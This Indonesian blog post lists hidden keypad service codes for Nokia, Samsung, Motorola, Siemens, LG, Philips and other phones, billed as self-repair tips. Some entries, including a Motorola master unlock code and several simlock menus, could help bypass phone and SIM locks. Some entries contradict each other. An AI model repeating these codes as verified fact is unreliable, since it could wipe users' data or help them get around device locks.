Sebagai bahan acuan, alias yang terpenting untuk kita perhatikan bahwa dashboard anda lebih baik dengan menggunakan alamat draft blogger dan menggunakan bahasa inggris, dalam bahasa indonesia, menu toolbar untuk posting lebih miskin sedikit sehingga pelayanannya terbatas.

Ditulis Oleh: Cumie

Read more

kumpulan kode rahasia semua merek handphone

Posted in
by DareDeviL

Kode rahasia handphone adalah kode-kode yang digunkan oleh para pakar headphone dalam memperbaiki HP. bila handphone anda bermasalah jangan dulu di bawa ke counter / tempat service ! kenali dulu masalahnya apa. jangan sampai anda keluar uang banyak padahal kerusakannya bisa anda perbaiki sendiri. ini wajib di ketahui oleh anda. Jika anda mau jadi pakar hp, juga paling umum di gunakan selain harus tahu istilah handphone, entah untuk pemilik counter hape, makelar hape atau sebagai panduan membeli handphone second agar anda tidak tertipu seperti kang salman dulu (saat masih gaptek hehe) . Dan bila anda kurang puas, kang salman sudah siapakan daftar lengkap yang lainya dan bisa di download disini. oh ya disini kamu bakal tahu cara merawat batrei handphone, tentu saja hal itu tidak cukup, sevice hp temen kecil-kecilan dan mudah sehingga bisa nambah uang saku kamu, apalagi kalo kamu demen maen hack hape.



Macam-macam kode rahasia handphone adalah code-code yang biasa dipergunakan untuk mereparasi perangkat handphone atau dalam
perbaikan ponsel hanya dengan menekan tombol keypad yang ada pada handphone yang telah mengalami kerusakan, kerusakan-kerusakan
ini bisa tergolong ringan maupun berat, dalam teknik perbaikan ini tidak memerlukan perangkat lain atau alat bantu yang
biasa digunakan untuk mereparasi pada handphone yang rusak, sedang kerusakan-kerusakan ini seperti : Hang, System Error, Aplikasi
Error, Phone Lock, Searching, Dll

Jika Ingin Download Dafar Kode Lebih Lengkap Klik Disini

Kode akses Nokia
*#30# : Menampilkan ‘private number’ yang menghubungi anda.
*#73# : Mereset timer ponsel dan skor game (pada beberapa ponsel).
*#7780# : Mengembalikan ke setting pabrik (factory setting).
*#2820# : Alamat IP perangkat Bluetooth (untuk ponsel yang mempunyai Bluetooth).
xx# : Akses cepat ke nama/nomer telepon di phone book ponsel, misalnya 20#.
Tombol off : Menekan dengan singkat, untuk berpindah antar profile.
*3370# : Mengaktifkan EFR(Enhanced Full Rate) Codec (tidak berlaku di ponsel Symbian).
#3370# : Menonaktifkan EFR Codec.
*#4270# : Mengaktifkan Half Rate Codec.
*#4270# : Menonaktifkan Half Rate Codec.
*#0000# : Menampilkan versi software ponsel.
*#9999# : Kode alternatif jika *#0000# tidak bekerja.
*#06# : Melihat nomor IMEI (Internasional Mobile Equipment Identity).
*#21# : Mengecek nomor pengalihan “All Call” yang digunakan.
*#2640# : Menampilkan kode keamanan ponsel yang digunakan.
*#43# : Mengecek status “Call Waiting”.
*#61# : Untuk mengecek nomor pemanggil yang dialihkan ketika tak anda jawab.
*#62# : Mengecek nomor pemanggil yang dialihkan ketika ponsel anda di luar jangkauan.
*#67# : Mengecek nomor pemanggil yang dialihkan ketika ponsel anda sedang sibuk.
**21*number# : Menghidupkan pengalihan “All Call” pada nomor yang diisi.
**61*number# : Menghidupkan pengalihan “No Reply” pada nomor yang diisi.
**67*number# : Menghidupkan pengalihan “On Bussy” pada nomor yang diisi.
*#67705646# : Mengganti logo operator logo pada Nokia 3310 dan 3330.
*#746025625# : Menampilkan status SIM Clock.
*#7760# : Menampilkan kode pabrikan (sebagian besar ponsel tipe lama).
*#92702689# : Memunculkan : 1. Serial Number, 2. Date Made, 3. Purchase Date, 4. Date of last repair, 5.Transfer user data. Keluar dari mode ini harus merestart ponsel ( pada beberapa ponsel ).


Kode akses Sony Ericsson

*#06# : Melihat nomor IMEI (Internasional Mobile Equipment Identity).
*#0000# : Mereset bahasa kembali ke English.
> * < < * < * : Service Menu - menampilkan versi software ponsel. Tekan “Yes” berulang-ulang untuk melihat semua data software dan tekan “>” untuk melihat semua teks yang terdapat pada ponsel.
< * * < : Mengunci SIM Card. Sortcuts : 1. Menyimpan nomor “Missed Call” di direktori ponsel. Cari menu “Missed Call”, tekan “Yes” untuk menampilkan nomor yang dituju. Tekan nomor apa saja ( 0 sampai 9 ), kemudian tekan “clear” sekali untuk memblok nomor tersebut, kemudian tekan dan tahan “<” sampai muncul “Store”, tekan “Yes”. 2. Menyembunyikan nomor. Setelah menekan nomor yang dituju dan sebelum menekan “Yes”, tekan ‘ > ‘ 2 kali untuk memilih “Hide Id?” dan tekan ‘Yes’.


3. Mengecek level batere ketika ponsel mati (off ).
Tekan ‘No’ secara cepat 1 x dan tunggu hingga tampilan baterai terlihat.

4. Menyimpan nomor di memori ponsel (bukan SIM Card).
Ikuti prosedur normal untuk menyimpan nomor. Ketika tampilan untuk menyimpan terlihat tekan ‘#’ sekali dan lokasi yang diinginkan, atau tekan ‘#’ 2 kali untuk melihat posisi lanjutan.

5. Menghubungi nomor dari pesan SMS.
Mengarahkan kursor pada nomor yang tertulis, kemudian tekan “Yes”.

Shortcut Penampilan Gambar :
(Berlaku di sebagian besar ponsel Symbian).
Ketika melihat image atau gambar di galeri, tekan :
1 : untuk memutar gambar ke kiri.
2 : untuk memutar gambar ke kanan.
5 atau 7 : untuk memperbesar (zoom) gambar.
* : untuk tampilan fullscreen atau non fullscreen.
Catatan : perintah angka di atas bisa berbeda di setiap ponsel.

Hard Reset :
Peringatan !!! Semua data ponsel akan hilang.

Dalam keadaan ponsel mati (off), tekan secara bersamaan tombol telepon (bicara), angka 3, dan tombol * (bintang). Kemudian dalam keadaan menekan ketiga tombol tersebut, tekan tombol On. Trik ini berlaku di sebagian besar ponsel Nokia.

Update Tambahan Nokia GSM
Nokia 21xx
Kode Penjelasan
*#06# Kode IMEI
*#3283# Minggu Produksi/Bulan & Tahun
*#9999# Versi Software

Nokia 32xx

Kode Penjelasan
*#06# Kode IMEI
*#0000# Versi Software
*#92702689# Menu Layanan
*#746025625# Sim Clock Stop
*3370# EFR aktif, suara lebih jernih, baterai cepat habis.
#3370# EFR inactive.
*4720# HR aktif, suara tidak lebih jernih, baterai tahan lama.
#4720# HR OFF.

Nokia 51xx

Kode Penjelasan
*#06# Kode IMEI
*#0000# Versi Software
*#92702689# Menu layanan
*3370# EFR aktif, suara lebih jernih, baterai cepat habis.
#3370# EFR inactive.
*4720# HR aktif, suara tidak lebih jernih, baterai tahan lama.
#4720# HR OFF.

Nokia 61xx

Kode Penjelasan
*#06# Kode IMEI
*#0000# Versi Software
*#92702689# Menu layanan
*3370# EFR aktif, suara lebih jernih, baterai cepat habis.
#3370# EFR inactive.

Nokia 81xx

Kode Penjelasan
*#06# Kode IMEI
*#8110# Versi Software, tanggal produksi & nomor model
*#92702689# Menu layanan

Nokia 88xx

Kode Penjelasan
*#06# Kode IMEI
*#0000# Versi Software
*#92702689# Menu Layanan
*3370# EFR aktif, suara lebih jernih, baterai cepat habis.
#3370# EFR inactive.

Nokia 90xxKode Penjelasan
*#06# Kode IMEI
*#6823711
58412125# Versi Software

*#3283# Tanggal Produksi

Motorola
Code:
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).

2. *#303# OK Mengubah ke bahasa inggris.

3. *#300# OK Menampilkan versi software (SW and HW Version).

4. *#301# OK Test keypad.

5. 1234 OK Kode default ponsel.

6. *#311# OK Merubah kode ponsel default.

7. ***113*1* OK Net Monitor ON.

8. **113*1* OK Net Monitor OFF.

9. *#304# OK Set Off engineering mode.

10. *#304*1998072# OK Set On engineering mode.

11. *#307* OK Engineering test mode.

12. *#400# OK ADC call val.

13. 19980722 OK Master unlock code for phone and sim lock.

14. *#0000# OK Setting and restore.

15. *#402# OK Contrast

16. *#305# OK Location 1

Samsung
Code:
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).

2. *#9999# atau *#9998*9999# Menampilkan versi software.

3. *#9999# atau *#9998*8888# Menampilkan versi hardware.

4. *#9998*76# Menampilkan nomor produksi.

5. *#9998*288# atau *#0288# Mengecek status baterai.

6. *#0246# atau *#0377# Menampilkan kapasitas ruang penyimpanan / memori.

7. *#9998*782# atau *#0782# Menampilkan tanggal dan waktu alarm.

8. *#8999*638# Menampilkan informasi jaringan telepon.

9. *#9998*523# atau *#0523# Mengatur kontras layar.

10. *#8999*5646# Mengubah logo operator.

11. *#0289# Tes ringtone.

12. *#9998*842# atau *#0842# Tes vibrate.

13. *#9998*289# atau *#0289# Mengubah suara alarm.

14. *#9998*746# atau *#0746# Melihat informasi kartu SIM

15. *2767*2878# Mengunci ponsel.

16. *2767*3855# Mereset memori, jangan lupa mencabut kartu SIM.

17. *#0324# Net Monitor

18. *#0001# Display RS232 serial communication parameter setup.

19. *9266# Display received channel number and received intensity.

20. *#9998*377# atau *#0377# Software error LOG (wrong display of EEPROM).

21. *#9998*778# atau *#0778# SIM Service Table.

22. *#0837# Instruction Software.

23. *#0001# Show Serial Parameter.

24. *#9998*968# View Melody Alarm.

25. *#9998*585# Non Volatile Memory.

26. *#3243948# Digital Audio Interference off.

27. *#32436837# Digital Audio Interference.

28. *#9998*4357# Help Menu.

29. *#9998*5282# Java Menu.

30. *2767*5282# Java Reset.

31. *2767*927# WAP Reset.

32. *2767*63342# Reset Media.

33. *#9999#0# Monitor Mode.

Siemens
Code:
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).

2. *#0000# Mengembalikan ke bahasa default.

3. **05*PUK*newPIN*newPIN# Deblock PIN using PUK.

4. **052*PUK2*newPIN2*newPIN2# Deblock PIN2 using PUK2.

5. **04*old_PIN*new_PIN*new_PIN# Mengubah PIN.

6. **042*old_PIN2*new_PIN2*new_PIN2# Mengubah PIN2.

7. *31# Menyembunyikan nama/nomor telepon pada ponsel penerima (CLIR).

8. #31# Menonaktifkan CLIR.

9. *#31# Mengecek status CLIR.

10. *30# Menampilkan nama/nomor telepon pada ponsel penerima (CLIP).

11. #30# Menonaktifkan CLIP.

12. *#30# Mengecek status CLIP.

13. *43# Mengaktifkan Call Waiting/Call Hold.

14. #43## Menonaktifkan Call Waiting.

15. *#43# Mengecek status Call Wating.

16. *#0001# lalu tekan tombol hijau (Call) Mengubah bahasa menggunakan kode.
Angka 0001 adalah kode untuk bahasa inggris.
Kode: 0030 (Yunani),
0031 (Belanda),
0032 (Perancis),
0034 (Spanyol),
0039 (Itali),
0049 (Jerman),
0090 (Turki).

17. *#0606# Shows if the phone is locked to any network (Use without SIM card).




BenQ-Siemens

Code:
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).

2. *#0000# Mengembalikan ke bahasa default.

3. *#0001# lalu tekan tombol hijau (Call) Mengubah bahasa menggunakan kode.
Angka 0001 adalah kode untuk bahasa inggris.
Kode: 0030 (Yunani),
0031 (Belanda),
0032 (Perancis),
0034 (Spanyol),
0039 (Itali),
0049 (Jerman),
0090 (Turki)

4. *#9999# Mereset ke setingan awal (pabrikan).

5. *#300# Mengecek software.

6. *#301# Mengecek hardware.


LG

Code:
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).

2. *#07# Menampikan nomor IMEI dan versi software (LG 510).

3. *8375# Menampilkan versi software (LG B1200).

4. #PWR668 Test pabrikan (LG B1200).

5. 1945#5101# Simlock menu (LG B1200).

6. 2945#*5101# Simlock menu (LG 510W, 5200)

7. 2945#*70001# Simlock menu (LG 7020,7010)


Philips
Code:
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).

2. *#3353*# Mereset ponsel.

3. *#7337*# Mereset ponsel (Master reset), kartu SIM dicabut dulu..

4. *#337*# Mengaktifkan/menonaktifkan EFR.

5. *#7693# Mengaktifkan/menonaktifkan Sleep Mode. Aktifkan saja untuk
menghemat konsumsi baterai ketika ponsel sedang tidak dipakai.

6. *#8463*# Menampilkan beberapa informasi Sleep Mode: Wake, Sleep Req., Sleep.

7. *#2286*# Mengaktifkan data baterai.

8. *#7948*# Mematikan ponsel.

9. *#7728*# Menampilkan RSAV.

10. *#7524*# Menampilkan KCGPRS.

11. *#7562*# Menampilkan SIM Phase.

12. *#7629*# Menampilkan POOL MAX.

13. *#7632*# Menampilkan Code Bugging dari sleep mode.

14. *#7733*# Menampilkan Cluster aktif.

15. *#7343*# Menampilkan kode Cluster.

16. *#7352*# Menampilkan registrasi software.

17. *#7763*# Menampilkan informasi produk.

18. *#7766*# Menampilkan versi produk.

19. *#7326*# Menampilkan pilihan aksesoris untuk vibrator.

20. *#7276*# Mengaktifkan GPRS Attach.

21. *#7287*# Mengaktifkan GPRS Attached.

22. *#7288*# Mengaktifkan GPRS Try Attached.

23. *#7271*# Mengaktifkan GPRS Kelas 1

24. *#7274*# Mengaktifkan GPRS Kelas 4.

25. *#7252*# Mengaktifkan GPRS Kelas B.

26. *#7224*# Mengaktifkan GPRS Kelas C.

27. *#7222*# Mengaktifkan CSD GSM Kelas C.

28. *#7762*# Melakukan seting SMS bearer GPRS.

29. *#8377*# Menampilkan versi software.

30. *#3377*# Menampilkan kondisi EEPROMP.

31. *#2254# Status Register.

32. *#2255# Active/Deactive “Debug Call”, when activated,
make a call to a busy line an the phone will display some hex-codes
on the display.

33. *#2558# The time in days, hours, and minutes you are connected to the net..

34. *#7489*# atau *#1234*# Security Code.

35. *#7378*# Name, Length, SIM Phase.

36. *#3333*# Blocking list


Panasonic
Code:
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).

2. **7370# Memformat ulang.[/quote]

Catatan :
Daftar di atas adalah sebagian yang saya tuliskan, maaf ya jari kang salman sudah pegel jika ingin
Download Daftar Kode Rahasia Handphone lebih lengkap klik disini

Read more

Game Penghasil Euro

Join khalilmn3's empire
Copyright 2010 @ DareDeviL